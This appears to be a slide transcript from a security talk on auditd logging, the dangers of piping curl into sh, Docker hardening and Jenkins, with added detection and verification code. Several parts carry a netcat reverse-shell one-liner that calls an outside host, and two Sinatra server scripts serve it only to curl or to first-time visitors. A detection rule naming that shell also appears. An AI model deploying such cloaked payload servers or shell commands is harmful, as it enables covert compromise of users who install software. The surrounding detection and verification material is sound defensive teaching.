WHO'S THIS CLOWN?
▸ Infrastructure security at Etsy.
▸ Recovered operations monkey at Puppet Labs.
▸ Own a lot of black t-shirts.
▸ Had 1300 accounts on his high school Linux system. (: https://twitter.com/skullmandible/status/411281851131523072
— @benjammingh for LasCon 2015
SETLIST
▸ Intros. (you are here)
▸ Frame the problem, why am I here.
▸ Things from the real world(™) & how to cope.
▸ Far far too many summaries.
▸ Wings, moonshine and dancing? (I have no idea)
FROM TINY SEEDS, DO MIGHTY ACORNS GROW.
▸ PinkiePwn's 6 tiny bugs in Chrome to full sandbox escape.
▸ Egor Homakov's 5 small bugs in GitHub to full private access on GitHub.
▸ XSS to remote code execution in under an hour.
▸ Username & password from HVAC system leads to
SECURITY PEOPLE AREN'T GREAT SECURE CODERS.
▸ Snort: 10 CVEs, Wireshark: 322 CVEs!
▸ Security Firm Bit9 Hacked, Used to Spread Malware
▸ Joxean Koret on Breaking Antivirus software
▸ Tavis from Project Zero on exploiting ESET
▸ BEST! FireEye just running Apache/PHP as root!
SO WHO DO I TRUST?
▸ No one? Always a great position for security people, who don't want to get paid.
▸ Everyone? Do I have some emails with funny cats for you to click on.
▸ Security vendors? If you have infinite money and no attackers.
▸ Attackers!
GO USE GITROB
▸ http://michenriksen.com/blog/gitrob-putting-the-open-source-in-osint/
▸ https://github.com/michenriksen/gitrob
COPING WITH MULTILINE AUDITD
▸ ELK: multiline filter in Logstash.
▸ Other: github/gdestuynder/Audisp-json
▸ Have cash, want a decent GUI (and more): Go use Threatstack!
▸ Write something yourself in python & golang: I keep promising to OSS this ):
ALERT ON SKETCHY THINGS. (ASSUMES ELK)
1. Elastalert from Yelp
2. Alert on "/bin/nc *-e /bin/sh*"
3. You will now find when someone tries to run a reverse shell!
4. Or when your ops people do fun things.
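The two slides above are the whole problem in miniature: auditd writes one execve as several records (SYSCALL, EXECVE, CWD, PATH) that only share an audit(timestamp:serial) id, it splits argv into a0..aN fields, and it hex-encodes any argument containing a space, so a substring rule for "nc -e /bin/sh" on raw records finds nothing. The script below is an added example, not code from the talk or from Elastalert/Logstash: it regroups records by event id, rebuilds argv (decoding the hex), and then applies the same intent as the slide's Elastalert pattern to the reconstructed command line. The log lines are constructed for the example; the process ids, host name and event serials are made up.

```python
import re

# Constructed sample, not from the talk: three execve events, each spread over
# several auditd records that share one audit(timestamp:serial) event id. The
# third event's a2 is hex-encoded, which auditd does for any argv element that
# contains a space or other unsafe character.
SAMPLE_AUDIT_LOG = """\
type=SYSCALL msg=audit(1445000000.101:4567): arch=c000003e syscall=59 success=yes exit=0 ppid=2001 pid=2002 auid=1000 uid=1000 comm="nc" exe="/bin/nc" key="execve"
type=EXECVE msg=audit(1445000000.101:4567): argc=5 a0="nc" a1="-e" a2="/bin/sh" a3="root.legit.pw" a4="2222"
type=CWD msg=audit(1445000000.101:4567):  cwd="/home/ben"
type=PATH msg=audit(1445000000.101:4567): item=0 name="/bin/nc" inode=1337 mode=0100755 ouid=0 ogid=0
type=SYSCALL msg=audit(1445000000.250:4568): arch=c000003e syscall=59 success=yes exit=0 ppid=2001 pid=2003 auid=1000 uid=1000 comm="ls" exe="/bin/ls" key="execve"
type=EXECVE msg=audit(1445000000.250:4568): argc=2 a0="ls" a1="-la"
type=SYSCALL msg=audit(1445000000.300:4569): arch=c000003e syscall=59 success=yes exit=0 ppid=2001 pid=2004 auid=1000 uid=1000 comm="sh" exe="/bin/dash" key="execve"
type=EXECVE msg=audit(1445000000.300:4569): argc=3 a0="sh" a1="-c" a2=6E63202D65202F62696E2F736820726F6F742E6C656769742E70772032323232
"""

EVENT_ID_RE = re.compile(r"msg=audit\((\d+\.\d+):(\d+)\)")
FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')
HEX_RE = re.compile(r"^(?:[0-9A-Fa-f]{2})+$")
ARGV_KEY_RE = re.compile(r"^a\d+$")
# Fields auditd hex-encodes (instead of quoting) when they hold unsafe bytes.
STRING_FIELDS = {"name", "cwd", "comm", "exe", "proctitle"}
# Same intent as the talk's Elastalert rule ("/bin/nc *-e /bin/sh*"), applied
# to a reconstructed command line instead of a raw record.
REVERSE_SHELL_RE = re.compile(r"\bnc\b.*\s-e\s+/bin/(?:ba)?sh\b")


def parse_record(line):
    """Split one auditd record into a dict, decoding hex-encoded strings.

    Only unquoted values are candidates for hex decoding, and aN fields are
    decoded only in EXECVE records: in a SYSCALL record a0..a3 are raw
    register values, not strings.
    """
    fields, unquoted = {}, set()
    for key, value in FIELD_RE.findall(line):
        if value.startswith('"'):
            fields[key] = value[1:-1]
        else:
            fields[key] = value
            unquoted.add(key)
    is_execve = fields.get("type") == "EXECVE"
    for key in unquoted:
        stringy = key in STRING_FIELDS or (is_execve and ARGV_KEY_RE.match(key))
        if stringy and HEX_RE.match(fields[key]):
            fields[key] = bytes.fromhex(fields[key]).decode("utf-8", "replace")
    return fields


def group_events(log_text):
    """Group records by their audit(ts:serial) id, preserving first-seen order."""
    events = {}
    for line in log_text.splitlines():
        match = EVENT_ID_RE.search(line)
        if match:
            event_id = f"{match.group(1)}:{match.group(2)}"
            events.setdefault(event_id, []).append(parse_record(line))
    return events


def execve_argv(records):
    """Rebuild argv from an event's EXECVE record, or None if it has none.

    Assumption: one EXECVE record per event. auditd splits very long argv
    across several EXECVE records (with aN[M] keys); that case is not handled.
    """
    for rec in records:
        if rec.get("type") == "EXECVE":
            return [rec.get(f"a{i}", "") for i in range(int(rec.get("argc", 0)))]
    return None


def find_reverse_shells(log_text):
    """Return one hit per event whose command line looks like nc -e /bin/sh."""
    hits = []
    for event_id, records in group_events(log_text).items():
        argv = execve_argv(records)
        if argv is None:
            continue
        cmdline = " ".join(argv)
        # Test each argument as well as the joined line, so that
        # sh -c "nc -e /bin/sh ..." is caught even though the nc invocation is
        # a single (hex-encoded) argv element.
        if any(REVERSE_SHELL_RE.search(s) for s in [cmdline, *argv]):
            syscall = next((r for r in records if r.get("type") == "SYSCALL"), {})
            hits.append({"event": event_id, "pid": syscall.get("pid"),
                         "auid": syscall.get("auid"), "exe": syscall.get("exe"),
                         "cmdline": cmdline})
    return hits


def naive_grep(log_text, needle="nc -e /bin/sh"):
    """What a substring rule sees on raw records: nothing, because argv is
    split into aN fields and may be hex-encoded."""
    return [line for line in log_text.splitlines() if needle in line]


if __name__ == "__main__":
    print("raw grep hits:", len(naive_grep(SAMPLE_AUDIT_LOG)))
    for hit in find_reverse_shells(SAMPLE_AUDIT_LOG):
        print(hit)
```

Run against the sample, the raw substring search finds nothing while the regrouped view flags both the direct `nc -e /bin/sh` and the `sh -c "nc -e /bin/sh ..."` wrapper, together with the pid, auid and exe from the SYSCALL record, which is what you actually want in the alert. The Logstash multiline filter or Audisp-json mentioned above do the regrouping step for you; the hex-decoding step is the one people forget.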
SINATRA EXAMPLE

```ruby
require 'sinatra'

# The innocent script a human sees when they open the URL in a browser.
def print_install_code
  "#!/bin/sh\necho 'installing legit.pw'\n"
end

get '/install.sh' do
  if request.env['HTTP_USER_AGENT'] =~ /curl/
    'nc -e /bin/sh root.legit.pw 2222 &'   # curl | sh gets the reverse shell
  else
    print_install_code                    # everyone else gets the readable script
  end
end
```
SINATRA EXAMPLE 2: PAYBACK

```ruby
require 'sinatra'

SEEN_BEFORE = []   # IPs that have already been served the payload

def print_install_code
  "#!/bin/sh\necho 'installing legit.pw'\n"
end

get '/install.sh' do
  # HTTP_CLIENT_IP is only set behind some proxies; fall back to the socket peer.
  ip = request.env['HTTP_CLIENT_IP'] || request.ip
  if SEEN_BEFORE.include? ip
    print_install_code                    # second look from that IP: innocent script
  else
    SEEN_BEFORE << ip
    'nc -e /bin/sh root.legit.pw 2222 &'   # first fetch from an IP: reverse shell
  end
end
```
VERIFIABLE
This doesn't exist:
foo$ curl legit.pw/sketch.sh | sudo sh --gpg-verify
No one has ever done this:
foo$ curl legit.pw/sketch.sh | gpg --verify --output - | sudo sh
CURL | BASH
"But I trust HTTPS"
▸ HTTPS certs cost ~$6.
▸ If I can't make $6 by owning a system, I should probably stop being an attacker.
▸ @letsencrypt will soon make this free.
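The Sinatra slides show the server side of the trick and the last two slides say why HTTPS and a non-existent `--gpg-verify` flag don't save you. As an added example, not code from the talk, here is the client-side discipline that does: download the whole thing first (never stream into sh), fetch it twice with different User-Agents and refuse if the bodies differ, and only run it once it matches a SHA-256 you got out of band. The fake servers, the URL `https://legit.pw/install.sh` and the script bodies are constructed for the example; the reverse-shell line is the one from the slides.

```python
import hashlib
import hmac
import os
import subprocess
import tempfile
import urllib.request

CURL_UA = "curl/7.43.0"
BROWSER_UA = "Mozilla/5.0 (X11; Linux x86_64; rv:41.0) Gecko/20100101 Firefox/41.0"

# Constructed sample bodies; the reverse-shell line is the one from the talk.
HONEST_SCRIPT = b"#!/bin/sh\necho installing legit.pw\n"
PAYLOAD = b"nc -e /bin/sh root.legit.pw 2222 &\n"


def http_fetch(url, user_agent):
    """Fetch the whole body into memory; nothing reaches sh while downloading."""
    req = urllib.request.Request(url, headers={"User-Agent": user_agent})
    with urllib.request.urlopen(req, timeout=30) as resp:
        return resp.read()


def fake_sketchy_server(url, user_agent):
    """Stand-in for the first Sinatra example: curl gets the shell, browsers the script."""
    return PAYLOAD if "curl" in user_agent else HONEST_SCRIPT


def fake_honest_server(url, user_agent):
    """Stand-in for a server that gives everyone the same script."""
    return HONEST_SCRIPT


def sha256_hex(data):
    return hashlib.sha256(data).hexdigest()


def check_install_script(url, expected_sha256=None, fetch=http_fetch):
    """Decide whether a curl|sh target is safe to run; returns a verdict dict.

    1. Fetch as curl and as a browser. A body that depends on the client is
       the User-Agent trick: refuse.
    2. If the caller pinned a SHA-256 obtained out of band (vendor docs, a
       signed release note), compare it in constant time.
    Only a pinned hash or a signature beats the per-IP "payback" variant,
    which serves the payload to the first request from each address.
    """
    as_curl = fetch(url, CURL_UA)
    as_browser = fetch(url, BROWSER_UA)
    if as_curl != as_browser:
        return {"ok": False, "pinned": False, "script": None,
                "reason": "server serves curl a different body than a browser"}
    digest = sha256_hex(as_curl)
    if expected_sha256 is None:
        return {"ok": True, "pinned": False, "script": as_curl, "sha256": digest,
                "reason": "consistent body but no pinned hash; read it before running"}
    if not hmac.compare_digest(digest, expected_sha256.lower()):
        return {"ok": False, "pinned": True, "script": None,
                "reason": f"sha256 mismatch, got {digest}"}
    return {"ok": True, "pinned": True, "script": as_curl, "sha256": digest,
            "reason": "consistent body and pinned sha256 matches"}


def run_verified(script):
    """Run a script that passed the check from a private 0700 file, not a pipe. Returns stdout."""
    fd, path = tempfile.mkstemp(suffix=".sh")
    try:
        with os.fdopen(fd, "wb") as fh:
            fh.write(script)
        os.chmod(path, 0o700)
        result = subprocess.run(["/bin/sh", path], capture_output=True, text=True, check=True)
        return result.stdout
    finally:
        os.unlink(path)


if __name__ == "__main__":
    url = "https://legit.pw/install.sh"   # assumed URL, following the talk's example
    for name, fetch in (("honest", fake_honest_server), ("sketchy", fake_sketchy_server)):
        verdict = check_install_script(url, sha256_hex(HONEST_SCRIPT), fetch=fetch)
        print(name, verdict["ok"], verdict["reason"])
        if verdict["ok"]:
            print(run_verified(verdict["script"]), end="")
```

The double fetch only catches the User-Agent version of the trick; against the per-IP version the first request from your address is the poisoned one and the check never sees a clean copy, which is exactly why the pinned hash (or a detached signature checked the same way, before execution) is the part that matters.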
>30% OF IMAGES IN DOCKER HUB CONTAIN HIGH PRIORITY SECURITY VULNS
- JAYANTH GUMMARAJU, TARUN DESIKAN AND YOSHIO TURNER FROM BANYANOPS
BUT IS DOCKER ITSELF SECURE?
▸ Don't run things as root.
▸ No really, stop running things as root.
▸ Did I mention not running things as root.
▸ It is also not 1999. (Docker 1.8 addresses some of this, with its changes to who it runs as)
SECURIFY THE DOCKER.
▸ Don't use --privileged.
▸ Use --cap-drop all, then --cap-add back only the minimum capabilities.
▸ Use Docker Notary
▸ Use GRSecurity (just do that anyway, if you can.)
▸ Use SELinux... I may as well ask for a pony here.
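The checklist above is easy to state and easy to forget in a deploy script, so here is an added example (not from the talk or from Docker) that audits a `docker run` command line against it: no `--privileged`, `--cap-drop=ALL` present, nothing like `SYS_ADMIN` or `ALL` added back, and a non-root `--user`. The option parser is a deliberate simplification that only knows a few value-less flags; the image name `legit/app` and the two command lines are constructed for the example.

```python
import shlex

# docker run options that take no value: a partial list, an assumption of this
# example. Any other option without "=value" is assumed to consume the next
# token, so `-p 8080:80` is not mistaken for the image name.
FLAG_ONLY = {"-d", "--detach", "-i", "-t", "-it", "-ti", "--rm", "--privileged",
             "--read-only", "--init", "-P", "--publish-all", "--no-healthcheck"}


def parse_docker_run(cmdline):
    """Pull the security-relevant options out of a `docker run ...` command line."""
    argv = shlex.split(cmdline)
    if argv[:2] != ["docker", "run"]:
        raise ValueError("not a `docker run` command")
    opts = {"privileged": False, "cap_drop": [], "cap_add": [], "user": None, "image": None}
    i = 2
    while i < len(argv):
        arg = argv[i]
        name, has_eq, inline_value = arg.partition("=")
        if not arg.startswith("-"):
            opts["image"] = arg   # first non-option is the image; the rest is its command
            break
        if arg == "--privileged":
            opts["privileged"] = True
            i += 1
            continue
        if arg in FLAG_ONLY:
            i += 1
            continue
        if has_eq:
            value = inline_value
        else:
            i += 1
            value = argv[i] if i < len(argv) else ""
        if name == "--cap-drop":
            opts["cap_drop"].append(value.upper())
        elif name == "--cap-add":
            opts["cap_add"].append(value.upper())
        elif name in ("--user", "-u"):
            opts["user"] = value
        i += 1
    return opts


def audit_docker_run(cmdline):
    """Return findings against the checklist; an empty list means it passes.

    Caveat: this only sees the command line. A USER directive in the image's
    Dockerfile also drops root, but is invisible here.
    """
    opts = parse_docker_run(cmdline)
    findings = []
    if opts["privileged"]:
        findings.append("--privileged: container gets every capability and every host device; remove it")
    if "ALL" not in opts["cap_drop"]:
        findings.append("no --cap-drop=ALL: container keeps Docker's default capability set; "
                        "drop all, then --cap-add only what it needs")
    if "ALL" in opts["cap_add"] or "SYS_ADMIN" in opts["cap_add"]:
        findings.append("--cap-add of ALL or SYS_ADMIN gives back most of what --privileged would")
    user = opts["user"]
    if user is None or user.split(":")[0] in ("0", "root"):
        findings.append("no --user (or user is root): the process runs as root inside the container")
    return findings


# Constructed examples: the weak command and the hardened one.
WEAK = "docker run --privileged -p 8080:80 legit/app"
HARDENED = ("docker run --cap-drop=ALL --cap-add NET_BIND_SERVICE "
            "--user 1000:1000 --read-only -p 8080:80 legit/app")

if __name__ == "__main__":
    for cmd in (WEAK, HARDENED):
        print(cmd)
        for finding in audit_docker_run(cmd) or ["ok"]:
            print("  -", finding)
```

The hardened line is the shape the slide is asking for: everything dropped, the one capability the service needs (binding port 80) added back, a numeric non-root user, and a read-only root filesystem on top. Wire the audit into whatever generates your run commands or compose files and the checklist enforces itself.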
▸ I am not saying Docker is ZOMG unhackable.
▸ It's just cgroups and namespacing. (just)
▸ Escapes will happen.
▸ They have a rad security team (Hi @diogomonica and @nathanmccauley)
UNPINCHOFSALTD
▸ You can use it in a way that is secure, enough.
▸ Network separation & segregation still works.
▸ Secrets/credentials are still a bigger problem.
▸ PLEASE don't just adopt it because it's new & shiny.
▸ ✨ unikernels ✨
MAKE JENKINS SUCK FEWER
* DISABLE EXECUTION ON THE MASTER JENKINS HOST.
* DISABLE ANONYMOUS ACCESS.
* (USE TRAVIS, IF YOU CAN)
JENKINS AS A FORCE FOR [SECURITY] GOOD
▸ Gauntlt "be mean to your code"
▸ https://github.com/secure-pipeline
▸ Even Adobe blog on secure software, zomg!
SUMMARY
▸ Computers are apparently hard.
▸ Security is clearly harder still, obv.
▸ Actually, trust and humans are hard.
▸ The typing is the easy bit. (ish)
MORE SUMMARY
▸ Complex systems lead to much more complex security problems. (see OAuth)
▸ Annual pen-tests don't scale, bug bounties can help.
▸ Attackers are mining any public info you have (GitHub, S3, pastebin?)
▸ No really, go check all your S3 buckets...
WILL THERE BE A SUMMARY OF SUMMARIES?
▸ I beg you to stop trusting curl.
▸ Auditd is awful, but it can be fewer awful.
▸ Jenkins, you probably have to have one.
▸ but that can be okay, nay, even useful for security.
A SUMMARY APPEARED, WHAT HAPPENED NEXT WILL SHOCK YOU
▸ Docker and security can be used in the same sentence.
▸ Understand your threat model (Apple's guide)
▸ Don't be a FireEye, stop running things as root.